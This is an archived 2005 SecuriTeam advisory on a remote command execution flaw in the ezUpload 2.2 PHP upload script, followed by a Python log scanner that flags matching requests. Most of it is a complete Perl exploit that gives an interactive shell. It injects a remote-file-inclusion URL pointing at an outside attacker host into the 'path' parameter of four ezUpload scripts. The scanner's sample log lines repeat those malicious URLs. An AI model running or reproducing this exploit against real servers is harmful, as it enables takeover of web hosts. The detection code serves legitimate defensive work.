[EXPL] ezUpload path Parameter Command Execution (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 08/14/05
To: list@securiteam.com Date: 14 Aug 2005 17:51:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
ezUpload path Parameter Command Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
ezUpload is a PHP script that allows web sites to manage file uploads.
Due to improper validation of user-provided input in ezUpload, remote
attackers can cause the program to execute arbitrary code. The following
exploit code can be used to test your system for the mentioned
vulnerability.
DETAILS
Vulnerable Systems:
* EzUpload version 2.2
Exploit:
#!/usr/bin/perl
#__________
#\______ \ ____ __| _/ \______ \____________ ____ ____ ____
# | _// __ \ / __ | | | \_ __ \__ \ / ___\ / _ \ / \
# | | \ ___// /_/ | | ` \ | \// __ \_/ /_/ > <_> ) | \
# |____|_ /\___ >____ | /_______ /__| (____ /\___ / \____/|___| /
# \/ \/ \/ \/ \//_____/ \/
# Bug Discovered By Johnnie Walker <whisky at bsdmail.org>
# credits to ATmaCa.....oh no I forgot I ain't kozan so atmaca no credits to u
# Greets: sirh0t , siLgi , Elisabeth And Her Bf Mattias
# Red Dragon: Nightmare . Johnnie Walker . 3rbil
# f0rtcu We Never f0rget You
use IO::Socket;
if ($ARGV[0] && $ARGV[1])
{
    $host   = $ARGV[0];
    $path   = $ARGV[1];
    $target = $ARGV[2];
    # One keep-alive connection is reused for every command entered below.
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
                                   PeerPort => "80") || die "Can't connect!\r\n";
    while (1) {
        print 'RedDrag0n@'.$host.'$ ';
        $cmd = <STDIN>;
        # Select the ezUpload script whose "path" parameter is abused
        # (target number from the command line; 1 / default = index.php).
        if ($target == 2) {
            $file = "initialize.php?path=http://sinanreklam.net/banner.gif?cmd=";
        } elsif ($target == 3) {
            $file = "customize.php?path=http://sinanreklam.net/banner.gif?cmd=";
        } elsif ($target == 4) {
            $file = "form.php?path=http://sinanreklam.net/banner.gif?cmd=";
        } else {
            $file = "index.php?path=http://sinanreklam.net/banner.gif?cmd=";
        }
        chop($cmd);
        last if ($cmd eq 'exit');
        print $sock "GET ".$path.$file.$cmd." HTTP/1.1\r\nHost: ".$host."\r\nConnection: Keep-Alive\r\n\r\n";
        # The remote script's output is expected between _begin_ and _end_
        # marker lines; anything outside them is discarded.
        $vuln = 0;
        while ($ans = <$sock>)
        {
            if ($vuln == 1) { print "$ans"; }
            last if ($ans =~ /^_end_/);
            if ($ans =~ /^_begin_/) { $vuln = 1; }
        }
        if ($vuln == 0) { print "Exploit Failed :(\r\n"; exit(); }
    }
}
else {
    print "EzUpload 2.2 Remote Command Execution\r\n\r\n";
    print "Target files : \r\n\r\n";
    print "1 index.php (default)\r\n";
    print "2 initialize.php\r\n";
    print "3 customize.php\r\n";
    print "4 form.php\r\n\r\n";
    print "Usage: perl $0 <host> <path_to_ezupload> [target_nr] \r\n\r\n";
    print "Example: perl $0 victim.com /ezupload/ 2 \r\n";
    exit;
}
#EoF
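As an added defender-side example (not part of the advisory or of the ezUpload project), the following Python script scans web server access log lines for the request shape the exploit above produces: a GET to one of the four listed ezUpload scripts whose path parameter carries a remote URL. The Apache combined log format, the sample client addresses and the example.invalid host are assumptions; the log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The four ezUpload scripts listed as targets in the exploit above.
TARGET_SCRIPTS = ("index.php", "initialize.php", "customize.php", "form.php")

# Combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEME_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def is_suspicious_request(target: str) -> bool:
    """True if an ezUpload target script is called with a remote URL in ``path``."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in TARGET_SCRIPTS:
        return False
    # parse_qs percent-decodes once; unquote again so a double-encoded
    # scheme (http%253A...) is still recognised.
    for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        if REMOTE_SCHEME_RE.match(unquote(value).lstrip()):
            return True
    return False


def scan_log(lines):
    """Return (client, target) for every request shaped like the exploit's GET."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_suspicious_request(m.group("target")):
            hits.append((m.group("client"), m.group("target")))
    return hits


# Constructed sample log lines (not real traffic): a normal page load, a request
# shaped like the exploit's GET, a percent-encoded variant and a local path.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Aug/2005:17:51:30 +0200] "GET /ezupload/index.php HTTP/1.1" 200 1834',
    '203.0.113.9 - - [14/Aug/2005:17:52:01 +0200] "GET /ezupload/index.php?path=http://sinanreklam.net/banner.gif?cmd=id HTTP/1.1" 200 512',
    '203.0.113.9 - - [14/Aug/2005:17:52:07 +0200] "GET /ezupload/customize.php?path=HTTP%3A%2F%2Fexample.invalid%2Fx.gif%3Fcmd%3Dls HTTP/1.1" 200 498',
    '203.0.113.7 - - [14/Aug/2005:17:53:00 +0200] "GET /ezupload/form.php?path=/var/www/ezupload/ HTTP/1.1" 200 1502',
]

if __name__ == "__main__":
    for client, target in scan_log(SAMPLE_LOG):
        print(f"possible ezUpload path= RFI attempt from {client}: {target}")
```

The local-path request is deliberately not flagged: the exploit relies on the remote URL, and local values deserve a separate check against the script's expected directory.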
ADDITIONAL INFORMATION
The information has been provided by <mailto:whisky@bsdmail.org> Batur Binbash.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.